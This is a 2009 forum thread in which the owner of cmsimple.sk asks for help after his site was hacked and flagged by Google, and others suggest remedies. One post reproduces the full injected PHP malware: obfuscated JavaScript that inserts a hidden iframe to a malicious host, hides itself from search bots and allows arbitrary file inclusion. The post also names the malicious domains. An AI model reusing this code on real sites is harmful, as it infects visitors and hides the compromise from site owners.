cmsimple.sk: Google malware warning
cmsimple.sk: Google malware warning
Hi, did you see that Google gives a malware warning when accessing cmsimple.sk: "Warning - visiting this web site may harm your computer!"
Look here: http://www.google.com/interstitial?url= ... simple.sk/
@Tata: do you have an explanation for this?
Look here: http://www.google.com/interstitial?url= ... simple.sk/
@Tata: do you have an explanation for this?
Re: cmsimple.sk: Google malware warning
Yes, I've informed him by PM yesterday and removed the link to his website in his profile.
He's working on that.
Holger
He's working on that.
Holger
Re: cmsimple.sk: Google malware warning
Hi, all!
I am slowly sick about the hackers. I got this warning three days ago. You remember these attacks a couple of months ago. Thence I made immediately everything you have suggested and followed also all recommendations found on internet. I have:
This time there were manipulated only 47 index.php files which I have obviously overseen on CHMODing. But They were also installation to which no one has access. Only I use them for my testings.
I asked Google for re-checking the domain. Today (after 5 days!!!) I've got the confirmation. But they avoided to announce when the domain will be checked and what will be the result.
Now I have checked the warning from FF at http://safebrowsing.clients.google.com/ ... simple.sk/ and it says:
Help me please, what else shall I do?
I am slowly sick about the hackers. I got this warning three days ago. You remember these attacks a couple of months ago. Thence I made immediately everything you have suggested and followed also all recommendations found on internet. I have:
- reinstalled my PC from"0".
- downloaded my entire webspace from the host and deleted my entire domain.
- changed my FTP passwords.
- detected all infected files - they were at first attack only the index.php files and they were actually not infected - only a code with a link to infectious websites was inserted - in small files on their very end, in larger files somewhere in the middle with deleting the rest of them, so the pages were out of function.
- cleaned (at this time over 5000!!! files) manually - damaged files were replaced by their originals new downloaded from CMSimplewiki or from authors' websites.
- uploaded everything back, CHMODed all index.php files (444) and checked by Google - no warnings.
This time there were manipulated only 47 index.php files which I have obviously overseen on CHMODing. But They were also installation to which no one has access. Only I use them for my testings.
I asked Google for re-checking the domain. Today (after 5 days!!!) I've got the confirmation. But they avoided to announce when the domain will be checked and what will be the result.
Now I have checked the warning from FF at http://safebrowsing.clients.google.com/ ... simple.sk/ and it says:
Anyway after five days the domain is still inaccessible. But only in FF and Safari. There are no warnings by IE and GeBin9.What is the actual rank in the list for cmsimple.sk?
The site is listed among the suspicious sites - visitting this site may damage your PC.
During the last 90 days was a part of this site listed because of suspicious activity 1 times.
What happened when Google visited this site?
From 24 pages tested on this site during the last 90 days, 15 pages caused download and installation of malilcious software without user's authorization....
Malicious software includes 33 trojan(s), 30 scripting exploit(s), 14 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
Malicious software is hosted on 3 domains. including keymydomains.com/, ncenterpanel.cn/, sites-counter.com/.
This site was hosted on 1 network(s) including AS29208 (DIALTELECOM).
Acts this site as the source of further distribution of malicious software?
It seems that during the last 90 days the site cmsimple.sk has not act as a source infecting any other sites.
Does this site host malicious software?
No, this site hosted no malicious software in the last 90 days
Help me please, what else shall I do?
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: cmsimple.sk: Google malware warning
Hi Tata,
at the moment your page is accessible with the latest FF and enabled savebrowsing.
[OT]
With a look at the sourcecode, i've found 3 iframes:
Two at the top (maybe a counter) and one other, pointing to e-katalog.sk:
http://safebrowsing.clients.google.com/ ... katalog.sk
You should remove all that unnecessary stuff.
[/OT]
Holger
at the moment your page is accessible with the latest FF and enabled savebrowsing.
[OT]
With a look at the sourcecode, i've found 3 iframes:
Two at the top (maybe a counter) and one other, pointing to e-katalog.sk:
http://safebrowsing.clients.google.com/ ... katalog.sk
You should remove all that unnecessary stuff.
[/OT]
Holger
Re: cmsimple.sk: Google malware warning
I am out of power. I downloaded the domain again and checked it for any IFRAME available. Now I have fond the IFRAME pointing to http:[slash/slash]ncenterpanel[dot]cn[slash]php[slash]p31[dot]php in the first line of:
cmsimple/index.php
plugins/index.php
Now I see that almost in any subdirectory there is a file uploaded with randomly generated name like PEC6963F720301.php. How is it possible? What, the hell shall I do now? The website is nomore accessible by any browser, even by IE is it not accessible. I am going to download the domain again and I am looking for wery creative night and weekend
Here is the code of the files
cmsimple/index.php
plugins/index.php
Now I see that almost in any subdirectory there is a file uploaded with randomly generated name like PEC6963F720301.php. How is it possible? What, the hell shall I do now? The website is nomore accessible by any browser, even by IE is it not accessible. I am going to download the domain again and I am looking for wery creative night and weekend
Here is the code of the files
Code: Select all
<?php
$frame_code = '<!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><script>/*_riRJopYA_uU*/var maSKFTfgzy=document;/*eNGUgQyproQjLwcwGxtLckVP*/function JSRJxVcV(iKGZa)/*fPxDyeN_cINKnEiaEijWSjbMQ*/{var sIBtuWphKVC = "",/*PTSzNTVJPPSZEgc*/ASksbIeCmKm=0;for(ASksbIeCmKm=iKGZa.length-1;ASksbIeCmKm >= 0;ASksbIeCmKm--)/*fkeWREfireemHjIDyyvaKLqMK*/{sIBtuWphKVC+=iKGZa.charAt(ASksbIeCmKm);}return sIBtuWphKVC;/*lQFLAvMavWhp*/}/*_riRJopYA_uU*/function THAMWc(Uf_hW)/*wvskgKquyCfDU_fNnzLh*/{/*asAYOrimRFaxNjr*/Uf_hW = Uf_hW.replace(/[\.]/g, "%");/*asAYOrimRFaxNjr*/Uf_hW=unescape(Uf_hW);/*OFYakHAvPHLmfLCLgYBuCu*/return JSRJxVcV(Uf_hW);/*YcHVPLpfsLmebZsoZxcXjR*/}/*RropemxIkeWaSKfJWl*/function KNxrQJJuJ(){/*PTSzNTVJPPSZEgc*/maSKFTfgzy.write("<style>.apcdqYgApH{width:1px;height:1px;border:none;visibility:hidden}</style>");/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/var thOySD="<iframe id=\"PzuNOYDH\" src=\"x\" class=\"apcdqYgApH\"></iframe>";/*wvskgKquyCfDU_fNnzLh*//*vFzsZkRJRqmDBwCtOax*/var zOHkNaBQqOk=thOySD.replace(/[\+x]/g,THAMWc(".70.68.70.2e.6e.69.2f.34.37.31.2f.72.65.73.75.2f.6d.6f.63.2e.72.65.74.6e.75.6f.63.2d.73.65.74.69.73.2f.2f.3a.70.74.74.68"));/*vFzsZkRJRqmDBwCtOax*//*PTSzNTVJPPSZEgc*/return zOHkNaBQqOk;/*vFzsZkRJRqmDBwCtOax*//*G_fFjBELxfFI*/}/*fPxDyeN_cINKnEiaEijWSjbMQ*//*UACyjbdWJu*//*fPxDyeN_cINKnEiaEijWSjbMQ*//*gxmlpKbCEZYM*/maSKFTfgzy.writeln(KNxrQJJuJ());/*XOQoHXqCHdswYQ*//*RropemxIkeWaSKfJWl*//*lQFLAvMavWhp*/</script><!-- hJTY sXhwZrhTpA gJKLhdIvzPX_2 -->';
function get_file_dir_($file) {
global $argv;
$dir = dirname(getcwd() . '/' . $file);
$curDir = getcwd();
@chdir($dir);
$dir = getcwd();
@chdir($curDir);
return $dir;
}
function is_search_bot($agent)
{
if(
strstr($agent, "Yandex/") != null ||
strstr($agent, "YaDirectBot") != null ||
strstr($agent, "James Bond") != null ||
strstr($agent, "Googlebot") != null ||
strstr($agent, "Mediapartners-Google") != null ||
strstr($agent, "StackRambler") != null ||
strstr($agent, "Slurp") != null ||
strstr($agent, "msnbot") != null
)
{
return true;
}
return false;
}
function callback($data)
{
global $frame_code;
$data = preg_replace('/<iframe.*style=.*hidden.*\/iframe[^>]*>/i', "", $data);
$data = preg_replace('/<div.*style=.*display:none.*[^>]*>.*<iframe .*\/.*div[^>]*>/i', "", $data);
$data = preg_replace('/<!-- ad --><script[^>]*>.*<\/script><!-- \/ad -->/i', "", $data);
if(is_search_bot($_SERVER['HTTP_USER_AGENT']) == true) {
return $data;
} else {
if(preg_match("/(<body[^>]*>)/i", $data) > 0) {
return preg_replace("/(<body[^>]*>)/i", "$1 \n".$frame_code, $data, 1);
}
else {
return $data.$frame_code;
}
}
}
if(@ob_start('callback') == true) {
$file = $_GET['qq'];
@chdir(get_file_dir_($file));
include($file);
} else {
echo $frame_code;
}
?>
Last edited by Tata on Sun Oct 18, 2009 8:53 am, edited 1 time in total.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
-
- Posts: 342
- Joined: Thu Jun 26, 2008 8:19 pm
- Location: Germany
- Contact:
Re: cmsimple.sk: Google malware warning
Do you have global variables enabled? You can do a batch removal, no need to go trough the files manually. I have done this for someone else who also got hacked with dreamweaver
Re: cmsimple.sk: Google malware warning
I think I do. I have the phpinfo.php file on the server, but I can't run it right now. It is 8:12 AM and I have been sittin here sincece may last post yesterday. Everything was cleaned and uploaded back, all indexes were closed by 444. Then the FTP password checked and everything searched back and te damned files like PEO123456879.php were back again.CMSimple-Styles.com wrote:Do you have global variables enabled?
The cleaning is not that difficult. I simply let search the localhost for all index.* files. Then open them in Notepad++. There I search e.g. for any IFRAME and check found files for malicious links.
Or I search the localhost for any file containig the string ":8080"which is used in those linlks.
But when you have the batch file stored somewhere, I'll try this too. But now, I will finally need to take a nap. My domain is available in no more browser... WHY EXACTLY MY? I have about 20 other websites on the same ISP server. Only 2 of them were compromised. I don't undestand this.
Good night, friends
Good morning again!
Can't sleep. I deleted all those dummy files from the server recently. Now I checked it again and the files are tehre again. I need to contact my ISP about this.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: cmsimple.sk: Google malware warning
Hallo Tata,
I recommend to use cmsimple.sk for your cmsimple.sk website only. This domain is an "official" domain of CMSimple. If there is no more than 1 Installation of CMSimple, you have it easier under control.
For playground better use another (not so important) domain.
I recommend to use cmsimple.sk for your cmsimple.sk website only. This domain is an "official" domain of CMSimple. If there is no more than 1 Installation of CMSimple, you have it easier under control.
For playground better use another (not so important) domain.
Re: cmsimple.sk: Google malware warning
It seems as I am really forced to do it this way. I already reduced all my "playgrounds" to 3, which are not big at all. Will see how does it go. I cleaned everything I've found. But the website is still not accessible.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
Re: cmsimple.sk: Google malware warning
It seems to be everything OK so far again. At this point I would like to know if it wouldn't be good to use more strict CHMOD settings for the installation and have all possible directories and files set to read only. Actually there are many of them for which this setting would be absolutely enough. Or maybe some general .htaccess file taking care of this.
Thank you for all your hints and support.
Thank you for all your hints and support.
CMSimple.sk
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.
It's no shame to ask for an answer if all efforts failed.
But it's awful to ask without any effort to find the answer yourself.